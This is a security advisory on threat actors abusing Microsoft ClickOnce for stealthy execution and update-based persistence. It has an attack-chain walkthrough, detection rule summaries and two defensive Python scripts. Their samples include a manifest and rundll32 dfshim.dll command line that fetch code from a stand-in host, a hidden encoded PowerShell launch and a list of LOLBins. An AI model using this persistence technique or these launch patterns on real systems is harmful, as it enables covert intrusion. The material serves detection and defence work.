high advisory

Threat Actors Weaponize ClickOnce Technology for Initial Access, Execution, and Persistence

Threat actors are actively abusing Microsoft's ClickOnce technology, specifically the `.application` and `.appref-ms` file types, to achieve stealthy initial access, execute malicious payloads inside legitimate Microsoft processes such as rundll32.exe and dfsvc.exe, and establish persistence through ClickOnce's built-in update mechanism, blending into process trees that traditional endpoint security controls tend to trust.

Threat actors are increasingly leveraging Microsoft's ClickOnce application deployment technology as a vector for delivering malware, achieving initial access, and maintaining persistence on Windows endpoints. This abuse, documented by CrowdStrike, takes advantage of ClickOnce's low-friction deployment model: installation needs only a click and runs per-user without administrative privileges, so it works against standard user accounts. Attackers exploit the fact that .application and .appref-ms files often receive less scrutiny than .exe files, allowing malicious payloads to execute within legitimate Microsoft process trees (rundll32.exe and dfsvc.exe). Because an installed ClickOnce application checks its deployment server for updates, an adversary who controls that server can push new code to a seemingly benign application at will, retaining remote access and updating the malware as needed, including changing C2 addresses and staging tooling for lateral movement. The stealth of this method and its reliance on signed Microsoft binaries make it a significant challenge for defenders who depend on traditional detection mechanisms.

Attack Chain

  1. Initial Access: Threat actors initiate the attack via social engineering, typically through phishing emails or malicious websites, to trick users into clicking a link or button.
  2. Deployment Trigger: The user interaction results in the download and subsequent execution (or "running") of a malicious ClickOnce manifest file (.application).
  3. Application Launch: Windows hands the .application file to its registered shell handler, which launches rundll32.exe with dfshim.dll (rundll32.exe dfshim.dll,ShOpenVerbApplication <manifest path or URL>) to start the ClickOnce deployment.
  4. Malicious Payload Execution: rundll32.exe (via dfshim.dll) or dfsvc.exe (the ClickOnce Deployment Service) connects to an attacker-controlled remote server specified in the manifest, downloads application components, and executes a malicious payload within their legitimate process trees.
  5. Persistence Establishment: Because the deployment manifest marks the application as installed (available offline), dfsvc.exe drops a malicious .appref-ms shortcut into the user's Start Menu (%APPDATA%\Microsoft\Windows\Start Menu\Programs\<publisher>\).
  6. Remote Update Mechanism: The .appref-ms file is a small text file containing the deployment URL and the application identity. It points back to the attacker-controlled deployment server named in the manifest's deploymentProvider, so every launch resolves through that server, enabling dynamic content delivery.
  7. Persistent Malicious Execution: Subsequent launches of the application from the Start Menu via the .appref-ms shortcut trigger dfsvc.exe to check the attacker-controlled server, download, and execute updated or entirely new malicious components without requiring further user authorization.
  8. Impact: This grants adversaries persistent remote access, facilitates command and control updates, and enables further post-exploitation activities such as lateral movement, all while operating under the guise of legitimate system processes.
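The mechanism behind steps 5 to 7 is visible in the deployment manifest itself: install="true" causes the Start Menu .appref-ms entry, deploymentProvider names the server that owns every future update, and an update subscription with beforeApplicationStartup makes dfsvc.exe consult that server on each launch. The following triage script is an added example, not CrowdStrike's or Microsoft's code. It parses a constructed manifest and a constructed .appref-ms line that mirror the attack chain; the host deploy.example.invalid, the publisher name and the TRUSTED_DEPLOY_HOSTS allow list are assumptions for the example.

```python
"""Triage a ClickOnce deployment manifest (.application) and an .appref-ms shortcut.

Added example (not CrowdStrike's or Microsoft's code). Manifest, host,
publisher and allow list below are constructed for illustration.
"""
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

ASM_V1 = "urn:schemas-microsoft-com:asm.v1"
ASM_V2 = "urn:schemas-microsoft-com:asm.v2"

# Deployment servers the organisation actually uses (assumed for the example).
TRUSTED_DEPLOY_HOSTS = {"clickonce.corp.example"}

# Constructed deployment manifest; real ones also carry dependency, hash and
# signature elements, which do not matter for this triage.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<asmv1:assembly manifestVersion="1.0"
    xmlns:asmv1="urn:schemas-microsoft-com:asm.v1"
    xmlns="urn:schemas-microsoft-com:asm.v2"
    xmlns:asmv2="urn:schemas-microsoft-com:asm.v2">
  <assemblyIdentity name="Invoice Viewer.application" version="1.0.0.3"
      publicKeyToken="0123456789abcdef" language="neutral"
      processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />
  <description asmv2:publisher="Contoso Finance" asmv2:product="Invoice Viewer"
      xmlns="urn:schemas-microsoft-com:asm.v1" />
  <deployment install="true" mapFileExtensions="true">
    <subscription>
      <update>
        <beforeApplicationStartup />
      </update>
    </subscription>
    <deploymentProvider codebase="http://deploy.example.invalid/Invoice Viewer.application" />
  </deployment>
</asmv1:assembly>
"""

# Constructed .appref-ms contents. On disk the file is UTF-16 text holding one
# line of the form "<deployment URL>#<application identity>".
SAMPLE_APPREF_MS = (
    "http://deploy.example.invalid/Invoice Viewer.application#"
    "Invoice Viewer.application, Culture=neutral, "
    "PublicKeyToken=0123456789abcdef, processorArchitecture=msil"
)


def _q(ns, tag):
    return "{%s}%s" % (ns, tag)


def triage_manifest(xml_text):
    """Pull out the deployment settings an analyst needs and flag the risky ones."""
    root = ET.fromstring(xml_text)
    ident = root.find(_q(ASM_V1, "assemblyIdentity"))
    desc = root.find(_q(ASM_V1, "description"))
    dep = root.find(_q(ASM_V2, "deployment"))

    codebase, installed, update_before_start = "", False, False
    if dep is not None:
        installed = dep.get("install", "false").lower() == "true"
        provider = dep.find(_q(ASM_V2, "deploymentProvider"))
        codebase = provider.get("codebase", "") if provider is not None else ""
        path = "/".join(_q(ASM_V2, t) for t in ("subscription", "update", "beforeApplicationStartup"))
        update_before_start = dep.find(path) is not None

    url = urlparse(codebase)
    info = {
        "name": ident.get("name", "") if ident is not None else "",
        "publisher": desc.get(_q(ASM_V2, "publisher"), "") if desc is not None else "",
        "installed": installed,
        "update_before_start": update_before_start,
        "provider_host": (url.hostname or "").lower(),
        "provider_scheme": url.scheme,
        "flags": [],
    }
    if installed:
        info["flags"].append("install=true: a Start Menu .appref-ms entry will be created")
    if update_before_start:
        info["flags"].append("update check before every launch: the server can replace the code at will")
    if info["provider_host"] and info["provider_host"] not in TRUSTED_DEPLOY_HOSTS:
        info["flags"].append("deploymentProvider host not trusted: " + info["provider_host"])
    if info["provider_scheme"] == "http":
        info["flags"].append("cleartext http deploymentProvider")
    return info


def parse_appref_ms(text):
    """Split an .appref-ms line into its deployment URL and identity fields."""
    url, _, identity = text.lstrip("\ufeff").strip().partition("#")
    parts = [p.strip() for p in identity.split(",")]
    fields = {"name": parts[0] if parts else ""}
    for p in parts[1:]:
        k, _, v = p.partition("=")
        fields[k.strip()] = v.strip()
    return {"url": url, "host": (urlparse(url).hostname or "").lower(), "identity": fields}


if __name__ == "__main__":
    report = triage_manifest(SAMPLE_MANIFEST)
    print(report["name"], "by", report["publisher"])
    for flag in report["flags"]:
        print(" -", flag)
    print("shortcut resolves to", parse_appref_ms(SAMPLE_APPREF_MS)["host"])
```

Run against a manifest recovered from a phishing page or a user's Downloads folder, the report tells you immediately whether the application persists, who can change its code, and where future launches will phone home. The same host check applied to the .appref-ms files under each user's Start Menu turns the persistence artefact in step 5 into a hunting query.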

Impact

The abuse of ClickOnce technology allows threat actors to achieve highly stealthy and persistent access to victim systems. By operating within legitimate Microsoft processes (rundll32.exe, dfsvc.exe), malicious payloads can bypass many traditional endpoint detection and prevention mechanisms. This method lowers the barrier to entry for attackers as it requires no elevated privileges and minimal user interaction. Successful attacks lead to persistent remote access, enabling data exfiltration, C2 communication, deployment of additional malware, and potential lateral movement across the network, making it difficult to detect and remediate.

Recommendation

  • Deploy the Sigma rules in this brief to your SIEM and tune for your environment to detect suspicious ClickOnce activity.
  • Enable Sysmon process creation (Event ID 1) logging to capture rundll32.exe and dfsvc.exe activity for the Detect ClickOnce Deployment Via rundll32.exe from Remote Source and Detect ClickOnce Service Spawning Suspicious Processes rules.
  • Configure file event logging (e.g., Sysmon Event ID 11 for file creation) for the Detect Suspicious .appref-ms File Creation in Start Menu rule.
  • Educate users about the dangers of running .application files from untrusted sources, even if they appear to originate from seemingly legitimate websites or emails.

Detection coverage (3 rules)

Detect ClickOnce Deployment Via rundll32.exe from Remote Source

high

Detects rundll32.exe loading dfshim.dll to initiate ClickOnce deployment, indicating potential execution of a remote or downloaded .application file. This is a common method for initial execution of malicious ClickOnce payloads.

Format: Sigma
Tactics: execution, initial_access
Techniques: T1218.011 (System Binary Proxy Execution: Rundll32), T1566 (Phishing)
Sources: process_creation, windows

Detect ClickOnce Service Spawning Suspicious Processes

high

Detects the dfsvc.exe (ClickOnce Deployment Service) spawning common scripting engines or utilities often used by malware, indicating a malicious payload being executed via the ClickOnce mechanism.

Format: Sigma
Tactics: defense_evasion, execution
Techniques: T1059.001 (PowerShell), T1059.003 (Windows Command Shell)
Sources: process_creation, windows

Detect Suspicious .appref-ms File Creation in Start Menu

medium

Detects the creation of .appref-ms files in the user's Start Menu by processes other than legitimate ClickOnce components (dfsvc.exe) or web browsers (which trigger dfsvc.exe). This may indicate an attempt to establish persistence by directly planting a malicious ClickOnce shortcut.

Format: Sigma
Tactics: defense_evasion, persistence
Techniques: T1547.001 (Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder)
Sources: file_event, windows
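To show the three rules above as concrete logic, here is an added example that implements them in plain Python and runs them over constructed Sysmon events; it is not the vendor's Sigma source. Field names follow Sysmon's process creation (Event ID 1) and file creation (Event ID 11) events. The ClickOnce shell handler really is rundll32.exe calling dfshim.dll's ShOpenVerbApplication export, but the paths, command lines, user name and host deploy.example.invalid in SAMPLE_EVENTS are constructed to fire each rule once alongside benign look-alikes (a Control Panel rundll32 call, the deployed application starting under dfsvc.exe, and dfsvc.exe or a browser writing the shortcut) that must stay quiet.

```python
"""The three ClickOnce detections as Python, run over constructed Sysmon events.

Added example, not the vendor's Sigma rules. Events below are constructed.
"""
import ntpath

# Interpreters and LOLBins a ClickOnce-delivered payload commonly hands off to.
SCRIPT_ENGINES = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "regsvr32.exe", "rundll32.exe", "msiexec.exe", "certutil.exe",
}
# Browsers hand the .application file to dfsvc.exe, which then writes the shortcut.
BROWSERS = {"msedge.exe", "chrome.exe", "firefox.exe", "iexplore.exe"}
# Command-line fragments showing the manifest came from outside the host.
DOWNLOADED_HINTS = ("http://", "https://", "\\downloads\\", "\\inetcache\\", "\\temp\\")


def _base(path):
    return ntpath.basename(path or "").lower()


def rule_rundll32_dfshim_remote(ev):
    """rundll32.exe invoking dfshim.dll on a manifest fetched from a URL or download folder."""
    if ev.get("EventID") != 1 or _base(ev.get("Image")) != "rundll32.exe":
        return False
    cl = (ev.get("CommandLine") or "").lower()
    if "dfshim.dll" not in cl or "shopenverbapplication" not in cl:
        return False
    return any(hint in cl for hint in DOWNLOADED_HINTS)


def rule_dfsvc_spawns_script_engine(ev):
    """dfsvc.exe should start the deployed application, not an interpreter or LOLBin."""
    return (ev.get("EventID") == 1
            and _base(ev.get("ParentImage")) == "dfsvc.exe"
            and _base(ev.get("Image")) in SCRIPT_ENGINES)


def rule_appref_ms_planted(ev):
    """An .appref-ms written into the Start Menu by anything but dfsvc.exe or a browser."""
    if ev.get("EventID") != 11:
        return False
    target = (ev.get("TargetFilename") or "").lower()
    if not target.endswith(".appref-ms") or "\\start menu\\programs\\" not in target:
        return False
    creator = _base(ev.get("Image"))
    return creator != "dfsvc.exe" and creator not in BROWSERS


RULES = {
    "rundll32_dfshim_remote": rule_rundll32_dfshim_remote,
    "dfsvc_spawns_script_engine": rule_dfsvc_spawns_script_engine,
    "appref_ms_planted": rule_appref_ms_planted,
}

DFSVC = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EDGE = r"C:\Program Files\Microsoft\Edge\Application\msedge.exe"
START_MENU = r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"

# Constructed events: ids 1, 3 and 6 are the true positives, the rest are benign.
SAMPLE_EVENTS = [
    {"id": 1, "EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe", "ParentImage": EDGE,
     "CommandLine": r'"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\dfshim.dll",'
                    r'ShOpenVerbApplication https://deploy.example.invalid/Invoice%20Viewer.application'},
    {"id": 2, "EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\rundll32.exe" shell32.dll,Control_RunDLL desk.cpl'},
    {"id": 3, "EventID": 1, "Image": PS, "ParentImage": DFSVC,
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"id": 4, "EventID": 1, "Image": r"C:\Users\alice\AppData\Local\Apps\2.0\ABCD1234\InvoiceViewer.exe",
     "ParentImage": DFSVC, "CommandLine": "InvoiceViewer.exe"},
    {"id": 5, "EventID": 11, "Image": DFSVC,
     "TargetFilename": START_MENU + r"\Contoso Finance\Invoice Viewer.appref-ms"},
    {"id": 6, "EventID": 11, "Image": PS,
     "TargetFilename": START_MENU + r"\Updater.appref-ms"},
    {"id": 7, "EventID": 11, "Image": EDGE,
     "TargetFilename": START_MENU + r"\Contoso Finance\Invoice Viewer.appref-ms"},
]


def run_rules(events):
    """Return (rule name, event id) for every rule that fires on every event."""
    return [(name, ev["id"]) for ev in events for name, rule in RULES.items() if rule(ev)]


if __name__ == "__main__":
    for name, ev_id in run_rules(SAMPLE_EVENTS):
        print(f"{name}: event {ev_id}")
```

Two tuning points worth noting: the first rule deliberately requires a URL or download-folder path on the command line, since internally deployed ClickOnce apps also go through dfshim.dll (drop that condition and enrich with the deploymentProvider host instead if you want every launch logged), and the second rule will stay silent for a payload that is itself the deployed .exe, so pair it with network telemetry from dfsvc.exe and its children.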

Detection queries are available on the platform. Get full rules →